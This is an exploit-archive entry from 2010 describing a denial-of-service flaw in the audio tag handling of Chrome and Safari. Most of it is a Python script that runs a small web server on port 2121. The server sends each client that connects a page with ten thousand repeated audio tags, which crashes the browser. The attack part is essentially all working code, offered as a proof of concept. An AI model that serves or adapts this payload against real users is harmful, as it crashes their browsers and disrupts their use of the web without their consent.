Multiple Browsers Audio Tag DoS Vulnerability

2010-04-21T00:00:00
ID 1337DAY-ID-11915
Type zdt
Reporter Chase Higgins
Modified 2010-04-21T00:00:00

Description

Exploit for multiple platform in category dos / poc

                                        
                                            =============================================
Multiple Browsers Audio Tag DoS Vulnerability
=============================================

#!/usr/bin/python
 
#Multiple Browsers Audio Tag Denial of Service Vulnerability
#any ogg file can be used for the DoS as long as it is a valid file on the server
#crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
#This script acts as a web server to DoS connecting clients
 
# Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
# Date: April 21th, 2010
# Author: Chase Higgins, http://twitter.com/tzDev
# Software Link: google.com/chrome, apple.com/safari
# Version: Google Chrome 5.0.375.9 dev
# Tested on: Mac OSX 10.5.8
  
import sys, socket;
 
def main():
    html = """
    <html>
    <body>
    """;
     
    html += "<audio src='myogg.ogg'>" * 10000;
     
    html += """
    </body>
    </html>
    """;
     
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
    s.bind(('', 2121));
    s.listen(1);
     
    while True:
        channel, details = s.accept();
        print channel.recv(256);
        channel.send(html);
        channel.close();
     
main();



#  0day.today [2018-02-16]  #